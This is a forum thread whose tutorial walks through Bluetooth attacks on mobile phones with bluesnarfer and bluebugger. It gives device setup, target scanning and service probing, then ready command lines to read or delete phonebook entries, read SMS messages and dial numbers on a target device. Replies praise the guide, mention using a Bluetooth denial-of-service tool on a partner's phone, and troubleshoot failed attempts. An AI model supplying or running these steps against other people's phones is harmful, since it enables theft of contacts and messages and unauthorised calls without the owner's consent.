Bluesnarfer & Bluebugger Guide With Backtrack

[drgr33n]

Hey Guys

Just thought I'd post a little on Bluetooth Hacking because I can see thereis a lot of questions and not alot of answers So here's how I hacked my samsung d600.

First I poped to my local supermarket and picked myself up a bluetooth dongle for 6.99!!!! Because my shitieToshiba Satellite P100 doesn't have bluetooth

Ok first lets configure BT.................

Type :

bt ~ # mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

Thats Bluesnarfer done, now for bluebugger.............

Type:

bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0

Ok now we can fire up are Bluetooth adaptor, so type:

bt ~ # hciconfig hci0 up

Now are bluetooth adaptor should be ready, check by typing :

bt ~ # hciconfig hci0

and you should see somthing like this:

hci0: Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0

Ok now we are ready to scan so type:

bt ~ # hcitool scan hci0

And you should see all the devices in the area. You can also use btscanner and btscanner has a bruteforce scanner for discovering hidden devices.

Now note the name and MAC of the target and let's move on.

First thing lets try to ping are target. Type:

l2ping <target MAC>

If you dont get a ping GOOD LUCK

Next we need to find out a little about the device we want to hack so lets fire up blueprint.

And type:

sdptools browse --tree --l2cap <target MAC>

And you should get somthing like this:

Code:

Browsing 00:16:DB:A1:B6:B9 ...
Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10000
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID128 : 0xdb1d8f12-95f3-402c-9b97-bc504c9a-55c4
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x1
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x6 - LanguageBaseAttributeIDList
  Data Sequence
    Code ISO639 (Integer) : 0x656e
    Encoding (Integer) : 0x6a
    Base Offset (Integer) : 0x100
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID128 : 0x1cdb1d8f-1295-f340-2c9b-97bc504c-9a55
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 57 42 54 45 58 54 00 00
Attribute Identifier : 0x8003
  Integer : 0x1

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10001
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1101 - SerialPort
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x2
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1101 - SerialPort
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 53 65 72 69 61 6c 20 50 6f 72 74 00 00

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10002
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1103 - DialupNetworking (DUN)
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x3
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1103 - DialupNetworking (DUN)
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 44 69 61 6c 2d 75 70 20 4e 65 74 77 6f 72 6b 69 6e 67 00 00
Attribute Identifier : 0x305
  Integer : 0x0

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10003
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1112 - HeadsetAudioGateway
    UUID16 : 0x1203 - GenericAudio
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x4
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1108 - Headset
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 56 6f 69 63 65 20 47 57 00 00

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10004
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x111f - HandsfreeAudioGateway
    UUID16 : 0x1203 - GenericAudio
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x5
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x111e - Handsfree
      Version (Integer) : 0x101
Attribute Identifier : 0x100
  Data : 56 6f 69 63 65 20 47 57 00 00
Attribute Identifier : 0x301
  Integer : 0x1
Attribute Identifier : 0x311
  Integer : 0x1

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10005
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x110a - AudioSource
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
      Channel/Port (Integer) : 0x19
    Data Sequence
      UUID16 : 0x0019 - AVDTP
      Channel/Port (Integer) : 0x100
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x110d - AdvancedAudio
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 41 64 76 61 6e 63 65 64 20 61 75 64 69 6f 20 73 6f 75 72 63 65 00 00
Attribute Identifier : 0x311
  Integer : 0x1

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10006
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x110c - RemoteControlTarget
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
      Channel/Port (Integer) : 0x17
    Data Sequence
      UUID16 : 0x0017 - AVCTP
      Channel/Port (Integer) : 0x100
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x110e - RemoteControl
      Version (Integer) : 0x100
Attribute Identifier : 0x311
  Integer : 0x100

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10007
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1106 - OBEXFileTransfer
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x6
    Data Sequence
      UUID16 : 0x0008 - OBEX
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1106 - OBEXFileTransfer
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00 00

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10008
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1105 - OBEXObjectPush
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x7
    Data Sequence
      UUID16 : 0x0008 - OBEX
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1105 - OBEXObjectPush
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 4f 62 6a 65 63 74 20 50 75 73 68 00 00
Attribute Identifier : 0x303
  Data Sequence
    Integer : 0x1
    Integer : 0x3
    Integer : 0x5
    Integer : 0xff

Now if you asked me what does this mean I wouldn't know, but I think it tells you abit about the channels and what services are running on what channel.

Anyway after playing abit I found that my D600 uses channel 7 for phonebook lookup etc. I think every make and model is diffrent so you might have to try a few until you get the right one. Like I said im only just getting to grips with linux So if anybodu knows anymore I'd love to read about it.

End Part 1

[drgr33n]

Part 2

Ok lets get to it ...... Start a shell and lets take a look at bluesnarfer's options so type:

bt ~ # bluesnarfer

And you should get :

Code:

bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD     : valid AT+CMD (GSM EXTENSION)

TYPE      : valid phonebook type ..
example   : "DC" (dialed call list)
            "SM" (SIM phonebook)
            "RC" (recevied call list)
            "XX" much more

-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel

-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search "name" in phonebook address
-s TYPE   : select phonebook memory storage
-l        : list aviable phonebook memory storage
-i        : device info

Ok so now we have some options lets begin type:

bluesnarfer [options] -C 7 -b <taget MAC>

for eg: bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55

And the hack should start ........

Now bluebugger Type:

Bluebugger -h

And you should get :

Code:

bluebugger 0.1 (cant post urls :D)
-----------------------------------------

Usage: bluebugger [OPTIONS] -a <addr> [MODE]

       -a <addr>     = Bluetooth address of target

       Options:
       --------
       -m <name>     = Name to use when connecting (default: '')
       -d <device>   = Device to use (default: '/dev/rfcomm')
       -c <channel>  = Channelto use (default: 17)
       -n            = No device name lookup
       -t <timeout>  = Timeout in seconds for name lookup (default: 5)
       -o <file>     = Write output to <file>

       Mode:
       -----
       info                   = Read Phone Info   (default)
       phonebook              = Read Phonebook    (default)
       messages               = Read SMS Messages (default)
       dial <num>             = Dial number
       ATCMD                  = Custom Command (e.g. '+GMI')

       Note: Modes can be combined, e.g. 'info phonebook +GMI'

Again now we have are options lets hack .............. Type:

bluebugger [OPTIONS] -c 7 -a <target MAC> [MODE]

for eg: bluebugger -m Dr_GrEeN -c 7 -a 00:11:22:33:44:55 dial 0845GAYPORN

And again you should see some results.

The only downside to hacking into my D600 is that you still have to allow it on the phone so its not exactly HACKING the D600 but its a good training session. And now you can go forth and play.

Hope you lot can understand my bad spelling ETC and have fun

PS : Can sombody swap these posts around? Sorry my fault and oh yea RFCOMM Connection refused error is normally wrong channel. If after using bluebugger you get operation already in progress error type:

hciconfig hci0 down
hciconfig hci0 reset
hciconfig hci0 up

And all should be well.

[-=Xploitz=-]

Dr_GrEen,

Bravo!!!

EXCELLENT TUTORIAL, AND WELCOME TO THE FORUMS!

P.S.

You know way 2 much about hacking Bluetooth to be a no0bie

Moving to tutorial Section.

Keep up the Great work!

[shamanvirtuel]

yep excellent work ..... i wish more new members contribute in such fruitful manner....

welcome and don't hesitate to ask if you got pb on anything......

BTW.... you may open an account on our wiki and add this tuto to our howto section.... could be really cool

THX

[imported_wyze]

Awesome tut man... was going to do a similar writeup, but time hasn't been my friend as of late

Another fun tool I like to use to let my old lady know her time is up playing games on her Blackberry (after hours on end) is a BT DoS prog in the tbear suite tanya.

[NoobBiscUiT]

ok so this is what i did and got.... i've been working with this for awhile now, and i HAVE searched everything, that's how i found this thread and other useful tools
*with editing

bluebugger -c 8 -a 00:19:A1:F6:00:75 dial 1434560092
bluebugger 0.1 ( MaJoMu |
-----------------------------------------

Target Device: '00:19:A1:F6:00:75'
Target Name: 'LG'

tcgetattr failed: Input/output error
bt_rfcomm_config() failed

channel 8 is my bt modem, and i can connect to it BUT when it establishes a connection my phone asks for a passkey, and i enter a random character, then it says connection failed.
im guessing there's a way to create a passkey between the phone and my computer through bt but i dont know how and thats why i'm asking this way too long question.
guidance would be great.
thanks

[deadbeef]

I've only used RFComm to do simple tasks and only with my cellular phone. So I can't really offer any advice on how to use that prog. But I do know that most of the time, except for in cellular phone pairing, there is a default passkey. A couple of different BT devices I own use 0000. Try that.

[NoobBiscUiT]

right, but i was using bluebugger so unless i have to do something with rfcomm first then why would that failure message come up.
my understanding is that they are different programs and have nothing to do with each other

[drgr33n]

Sorry didn't see this question lol

Please enter this command and post results

Code:

sdptools browse --l2cap <target MAC>

[NoobBiscUiT]

deal,
i believe i did this command when i first found my phone using btscanner,
then l2ping like you said

RESULTS.....wait. i didnt boot with my bluetooth.
ok i'll re do this